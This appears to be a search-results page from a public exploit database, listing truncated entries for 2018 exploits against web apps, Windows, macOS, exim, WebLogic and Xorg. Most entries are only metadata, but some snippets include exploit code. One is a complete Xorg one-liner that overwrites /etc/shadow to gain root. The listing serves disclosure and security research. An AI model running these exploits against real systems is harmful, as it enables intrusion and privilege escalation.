47885 matches found
Library Management System 1.0 - 'frmListBooks' SQL Injection
Exploit Title: Library Management System 1.0 - 'frmListBooks' SQL Injection Dork: N/A Date: 2018-10-29 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.sourcecodester.com/users/janobe Software Link:...
Grapixel New Media 2 - 'pageref' SQL Injection
Exploit Title: Grapixel New Media 2 - 'pageref' SQL Injection Exploit Author: Berk Dusunur Google Dork: N/A Type: Web App Date: 2018-10-26 Vendor Homepage: http://www.grapixel.com Software Link: http://www.grapixel.com Affected Version: v2 Tested on: MacosX CVE : N/A Proof Of Concept Time-Based s...
Delta Sql 1.8.2 - 'id' SQL Injection
Exploit Title: Delta Sql 1.8.2 - 'id' SQL Injection Dork: N/A Date: 2018-10-25 Exploit Author: Ihsan Sencan Vendor Homepage: http://deltasql.sourceforge.net/ Software Link: https://sourceforge.net/projects/deltasql/files/latest/download Software Link: http://deltasql.sourceforge.net/deltasql/...
MPS Box 0.1.8.0 - Arbitrary File Upload
Exploit Title: MPS Box 0.1.8.0 - Arbitrary File Upload Dork: N/A Date: 2018-10-25 Exploit Author: Ihsan Sencan Vendor Homepage: http://www.mpsbox.com/ Software Link: https://sourceforge.net/projects/mpsbox/files/latest/download Version: 0.1.8.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CV...
Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection
Exploit Title: Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection Dork: N/A Date: 2018-10-25 Exploit Author: Ihsan Sencan Vendor Homepage: https://vetclinic.sourceforge.io/ Software Link: https://sourceforge.net/projects/vetclinic/files/latest/download Version: 00.02 Category: Webapp...
Quick Count 2.0 - 'txtInstID' SQL Injection
Exploit Title: Quick Count 2.0 - 'txtInstID' SQL Injection Dork: N/A Date: 2018-10-25 Exploit Author: Ihsan Sencan Vendor Homepage: https://quickcount.sourceforge.io/ Software Link: https://sourceforge.net/projects/quickcount/files/latest/download Version: 2.0 Category: Webapps Tested on:...
BORGChat 1.0.0 build 438 - Denial of Service (PoC)
Exploit Title: BORGChat 1.0.0 build 438 - Denial of Service PoC Dork: N/A Date: 2018-10-22 Exploit Author: Ihsan Sencan Vendor Homepage: http://borgchat.10n.ro Software Link: http://borgchat.10n.ro/download.php Version: 1.0.0 build 438 Category: Dos Tested on: WiN7x64/KaLiLinuXx64 CVE: N/A POC: 1...
libtiff 4.0.9 - Decodes Arbitrarily Sized JBIG into a Target Buffer
/ libtiff up to and including 4.0.9 decodes arbitrarily-sized JBIG into a buffer, ignoring the buffer size. The issue occurs because JBIGDecode entirely ignores the size of the buffer that is passed to it: static int JBIGDecodeTIFF tif, uint8 buffer, tmsizet size, uint16 s struct jbgdecstate...
WebExec - (Authenticated) User Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Windows XP systems that are not part of a domain default to treating all network logons as if they were Guest. This prevents SMB relay attacks from gaining administrativ...
Simple Chat System 1.0 - 'id' SQL Injection
Exploit Title: Simple Chat System 1.0 - 'id' SQL Injection Dork: N/A Date: 2018-10-24 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.sourcecodester.com/php/11610/simple-chat-system.html Software Link: https://sourceforge.net/projects/simple-chat-system/files/latest/download Version: 1....
AjentiCP 1.2.23.13 - Cross-Site Scripting
Title: AjentiCP 1.2.23.13 - Cross-Site Scripting Author: Numan OZDEMIR https://infinitumit.com.tr Vendor Homepage: ajenti.org Software Link: https://github.com/ajenti/ajenti Version: Up to v1.2.23.13 CVE: CVE-2018-18548 Description: Attacker can inject JavaScript codes without Ajenti privileges b...
Simple POS and Inventory 1.0 - 'cat' SQL Injection
Exploit Title: Simple POS and Inventory 1.0 - 'cat' SQL Injection Dork: N/A Date: 2018-10-24 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.sourcecodester.com/php/11625/simple-pos-and-inventory-system.html Software Link:...
MPS Box 0.1.8.0 - 'uuid' SQL Injection
Exploit Title: MPS Box 0.1.8.0 - 'uuid' SQL Injection Dork: N/A Date: 2018-10-25 Exploit Author: Ihsan Sencan Vendor Homepage: http://www.mpsbox.com/ Software Link: https://sourceforge.net/projects/mpsbox/files/latest/download Version: 0.1.8.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE...
Ekushey Project Manager CRM 3.1 - Cross-Site Scripting
Exploit Title: Ekushey Project Manager CRM 3.1 - Cross-Site Scripting Date: 2018-10-16 Exploit Author: Ismail Tasdelen Vendor Homepage: http://creativeitem.com/ Software Link : http://creativeitem.com/demo/ekushey/ Software : Ekushey Project Manager CRM Version : 3.1 Vulernability Type : Cross-si...
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
// All respects goes to Zhiyi Zhang of 360 ESG Codesafe Team // URL: https://blogs.projectmoon.pw/2018/10/19/Oracle-WebLogic-Two-RCE-Deserialization-Vulnerabilities/ package ysoserial.payloads; import com.sun.jndi.rmi.registry.ReferenceWrapperStub; import sun.rmi.server.UnicastRef; import...
ClipBucket 2.8 - 'id' SQL Injection
Exploit Title: ClipBucket 2.8 - 'id' SQL Injection Dork: N/A Date: 2018-10-25 Exploit Author: Ihsan Sencan Vendor Homepage: http://clipbucket.com/ Software Link: https://sourceforge.net/projects/clipbucket/files/latest/download Version: 2.8.v3354 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64...
Adult Filter 1.0 - Buffer Overflow (SEH)
Exploit Title: Adult Filter 1.0 - Buffer Overflow SEH Exploit Author: Özkan Mustafa Akkuş AkkuS Discovery Date: 2018-10-25 Homepage: http://www.armcode.com/adult-filter/ Software Link: http://www.armcode.com/downloads/adult-filter.exe Version: 1.0 Tested on: Windows XP Professional SP3 ENG Steps ...
WebEx - Local Service Permissions Exploit (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WebEx Local Service Permissions Exploit', 'Description' = %q This module exploits a flaw in the 'webexservice' Windows service, which runs as...
xorg-x11-server < 1.20.3 - Local Privilege Escalation
CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su Overwrite shadow or any file on most Linux, get root privileges. BSD and any other Xorg desktop also affected. !/bin/sh local privilege escalation in X11 currently...
phptpoint Hospital Management System 1.0 - 'user' SQL injection
Exploit Title: phptpoint Hospital Management System 1.0 - 'user' SQL injection Date: 2018-10-24 Exploit Author: Boumediene KADDOUR Unit: Algerie Telecom R&D Unit Vendor Homepage: https://www.phptpoint.com/ Software Link: Version: 1 Tested on: WAMP windows 10 x64 CVE: unknown Description: Phptpoin...
phptpoint Pharmacy Management System 1.0 - 'username' SQL injection
Exploit Title: phptpoint Pharmacy Management System 1.0 - 'username' SQL injection Date: 2018-10-24 Exploit Author: Boumediene KADDOUR Unit: Algerie Telecom R&D Unit Vendor Homepage: https://www.phptpoint.com/ Software Link: https://www.phptpoint.com/pharmacy-management-system/ Version: 1 Tested...
ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution
Exploit Title: ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution Date: 2018-10-22 Exploit Author: Özkan Mustafa Akkuş AkkuS Contact: https://pentest.com.tr Vendor Homepage: https://www.projeqtor.org Software Link:...
Delta Sql 1.8.2 - Arbitrary File Upload
Exploit Title: Delta Sql 1.8.2 - Arbitrary File Upload Dork: N/A Date: 2018-10-25 Exploit Author: Ihsan Sencan Vendor Homepage: http://deltasql.sourceforge.net/ Software Link: https://sourceforge.net/projects/deltasql/files/latest/download Software Link: http://deltasql.sourceforge.net/deltasql/...
User Management 1.1 - Cross-Site Scripting
Exploit Title: User Management 1.1 - Cross-Site Scripting Date: 2018-10-16 Exploit Author: Ismail Tasdelen Vendor Homepage: http://ardawan.com/ Software Link : http://um.ardawan.com Software : User Management Version : 1.1 Vulernability Type : Cross-site Scripting Vulenrability : Stored XSS CVE :...
AiOPMSD Final 1.0.0 - 'q' SQL Injection
Exploit Title: AiOPMSD Final 1.0.0 - 'q' SQL Injection Dork: N/A Date: 2018-10-24 Exploit Author: Ihsan Sencan Vendor Homepage: https://aiopmsd.sourceforge.io/ Software Link: https://sourceforge.net/projects/aiopmsd/files/latest/download Version: 1.0.0 Category: Webapps Tested on:...
Open STA Manager 2.3 - Arbitrary File Download
Exploit Title: Open STA Manager 2.3 - Arbitrary File Download Dork: N/A Date: 2018-10-25 Exploit Author: Ihsan Sencan Vendor Homepage: http://www.openstamanager.com/ Software Link: https://sourceforge.net/projects/openstamanager/files/latest/download Version: 2.3 Category: Webapps Tested on:...
exim 4.90 - Remote Code Execution
Exploit Title: exim 4.90 - Remote Code Execution Date: 2018-10-24 Exploit Author: hackk.gr Vendor Homepage: exim.org Version: exim -1: authplainavailable = True if test: if lenl 70: sys.stdout.writel:70 + " ...\n" sys.stdout.flush else: print l.strip"\r".strip"\n" data = data + l if data.finddeli...
Fifa Master XLS 2.3.2 - 'usw' SQL Injection
Exploit Title: Fifa Master XLS 2.3.2 - 'usw' SQL Injection Dork: N/A Date: 2018-10-24 Exploit Author: Ihsan Sencan Vendor Homepage: http://fankstribe.org/ Software Link: https://sourceforge.net/projects/fifamasterxls/files/latest/download Version: 2.3.2 Category: Webapps Tested on:...
LANGO Codeigniter Multilingual Script 1.0 - Cross-Site Scripting
Exploit Title: LANGO Codeigniter Multilingual Script 1.0 - Cross-Site Scripting Date: 2018-10-16 Exploit Author: Ismail Tasdelen Vendor Homepage: http://pokkho.com/lango/ Software Link : http://pokkho.com/lango/auth/login Software : LANGO - Codeigniter Multilingual Script Version : 1.0...
SG ERP 1.0 - 'info' SQL Injection
Exploit Title: SG ERP 1.0 - 'info' SQL Injection Dork: N/A Date: 2018-10-24 Exploit Author: Ihsan Sencan Vendor Homepage: http://fankstribe.org/ Software Link: https://sourceforge.net/projects/sgerp/files/latest/download Version: 1.0 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64 CVE: N/A POC:...
Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting
Exploit Title: Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Errordesc' Cross-Site Scripting Dork: n/a Date: 2018-10-11 Exploit Author: Dino Barlattani Vendor Homepage: http://axiositalia.it/ Software Link: http://axiositalia.it/?pageid=1907 Version: 1.7.0/7.0.0 Category: Webapps Platform: AS...
Apache OFBiz 16.11.04 - XML External Entity Injection
Exploit Title: Apache OFBiz 16.11.04 - XML External Entity Injection Date: 2018-10-15 Exploit Author: Jamie Parfet Vendor Homepage: https://ofbiz.apache.org/ Software Link: https://archive.apache.org/dist/ofbiz/ Version: xXx xXx """ if lensys.argv = 1: print' Apache OFBiz 16.11.04 XXE' print' Use...
Adult Filter 1.0 - Denial of Service (PoC)
Exploit Title: ADULT FILTER 1.0 - Denial of Service PoC Date: 2018-10-28 Exploit Author: Beren Kuday GÖRÜN Vendor Homepage: http://www.armcode.com/adult-filter/ Software Link: http://www.armcode.com/downloads/adult-filter.exe Version: 1.0 Build 2007-Mar-12 Tested on OS: Windows XP Professional...
SIM-PKH 2.4.1 - Arbitrary File Upload
Exploit Title: SIM-PKH 2.4.1 - Arbitrary File Upload Dork: N/A Date: 2018-10-22 Exploit Author: Ihsan Sencan Vendor Homepage: https://simpkh.sourceforge.io/ Software Link: https://sourceforge.net/projects/simpkh/files/latest/download Version: 2.4.1 Category: Webapps Tested on: WiN7x64/KaLiLinuXx6...
Appsource School Management System 1.0 - 'student_id' SQL Injection
Exploit Title: Appsource School Management System 1.0 - 'studentid' SQL Injection Dork: N/A Date: 2018-10-19 Exploit Author: Ihsan Sencan Vendor Homepage: http://www.appsource.ug/school/ Software Link: https://sourceforge.net/p/appsource-school-system/code/ Version: 1.0 Category: Webapps Tested o...
ServersCheck Monitoring Software 14.3.3 - Arbitrary File Write
Exploit Title: ServersCheck Monitoring Software 14.3.3 - Denial of Service PoC Author: John Page aka hyp3rlinx Date: 2018-10-23 Vendor: www.serverscheck.com Software Link: http://downloads.serverscheck.com/monitoringsoftware/setup.exe CVE: N/A References:...
School ERP Pro+Responsive 1.0 - 'fid' SQL Injection
Exploit Title: School ERP Pro+Responsive 1.0 - 'fid' SQL Injection Dork: N/A Date: 2018-10-23 Exploit Author: Ihsan Sencan Vendor Homepage: http://www.arox.in/ Software Link: https://sourceforge.net/projects/school-management-system-php/files/latest/download Software Link: http://erp.arox.in/...
SIM-PKH 2.4.1 - 'id' SQL Injection
Exploit Title: SIM-PKH 2.4.1 - 'id' SQL Injection Dork: N/A Date: 2018-10-22 Exploit Author: Ihsan Sencan Vendor Homepage: https://simpkh.sourceforge.io/ Software Link: https://sourceforge.net/projects/simpkh/files/latest/download Version: 2.4.1 Category: Webapps Tested on: WiN7x64/KaLiLinuXx64...
ServersCheck Monitoring Software 14.3.3 - 'id' SQL Injection
Exploit Title: ServersCheck Monitoring Software 14.3.3 - 'id' SQL Injection Author: John Page aka hyp3rlinx Date: 2018-10-23 Vendor: www.serverscheck.com Software link: http://downloads.serverscheck.com/monitoringsoftware/setup.exe CVE: N/A References:...
Microsoft Data Sharing - Local Privilege Escalation (PoC)
Bug description: RpcDSSMoveFromSharedFilehandle,L"token",L"c:\blah1\pci.sys"; This function exposed over alpc, has a arbitrary delete vuln. Hitting the timing was pretty annoying. But my PoC will keep rerunning until c:\windows\system32\drivers\pci.sys is deleted. I believe it's impossible to hit...
MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection
Exploit Title: MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection Dork: N/A Date: 2018-10-23 Exploit Author: Ihsan Sencan Vendor Homepage: http://www.m-gb.org/ Software Link: https://sourceforge.net/projects/mopzz-gb/files/latest/download Version: 0.7.0.2 Category: Webapps Tested on:...
School ERP Pro+Responsive 1.0 - Arbitrary File Download
Exploit Title: School ERP Pro+Responsive 1.0 - Arbitrary File Download Dork: N/A Date: 2018-10-23 Exploit Author: Ihsan Sencan Vendor Homepage: http://www.arox.in/ Software Link: https://sourceforge.net/projects/school-management-system-php/files/latest/download Software Link: http://erp.arox.in/...
Microsoft Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows SetImeInfoEx Win32k NULL Pointer Dereference', 'Description' = %q This module exploits elevation of privilege vulnerability that exists i...
Viva Visitor & Volunteer ID Tracking 0.95.1 - 'fname' SQL Injection
Exploit Title: Viva Visitor & Volunteer ID Tracking 0.95.1 - 'fname' SQL Injection Dork: N/A Date: 2018-10-19 Exploit Author: Ihsan Sencan Vendor Homepage: https://viva-visitor.sourceforge.io/ Software Link: https://sourceforge.net/projects/viva-visitor/files/latest/download Version: 0.95.1...
Apple iOS/macOS - Sandbox Escape due to mach Message sent from Shared Memory
iohideventsystem sets up a shared memory event queue; at the end of this shared memory buffer it puts a mach message which it sends whenever it wants to notify a client that there's data available in the queue. As a client we can modify this mach message such that the server hidd on MacOS,...
eNdonesia Portal 8.7 - 'artid' SQL Injection
Exploit Title: eNdonesia Portal 8.7 - 'artid' SQL Injection Dork: N/A Date: 2018-10-21 Exploit Author: Ihsan Sencan Vendor Homepage: http://www.endonesia.org/ Software Link: https://sourceforge.net/projects/endonesia/files/latest/download Version: 8.7 Category: Webapps Tested on:...
Apple iOS/macOS - Sandbox Escape due to Trusted Length Field in Shared Memory used by HID Event Subsystem
iohideventsystem is a MIG service which provides proxy access to various HID devices for untrusted clients. On iOS it's hosted by backboardd and on MacOS by hidd. The actual implementation is in IOKit.framework. I, and also pangu jailbreak team, had previously found a few bugs in the kernel...
The Open ISES Project 3.30A - 'tick_lat' SQL Injection
Exploit Title: The Open ISES Project 3.30A - 'ticklat' SQL Injection Dork: N/A Date: 2018-10-18 Exploit Author: Ihsan Sencan Vendor Homepage: http://openises.sourceforge.net/ Software Link: https://sourceforge.net/projects/openises/files/latest/download Version: 3.30A050318 Category: Webapps Test...
Keybase keybase-redirector - '$PATH' Local Privilege Escalation
keybase-redirector is a setuid root binary. keybase-redirector calls the fusermount binary using a relative path and the application trusts the value of $PATH. This allows a local, unprivileged user to trick the application to executing a custom fusermount binary as root. Environment CentOS Linux...
The Open ISES Project 3.30A - Arbitrary File Download
Exploit Title: The Open ISES Project 3.30A - Arbitrary File Download Dork: N/A Date: 2018-10-18 Exploit Author: Ihsan Sencan Vendor Homepage: http://openises.sourceforge.net/ Software Link: https://sourceforge.net/projects/openises/files/latest/download Version: 3.30A050318 Category: Webapps Test...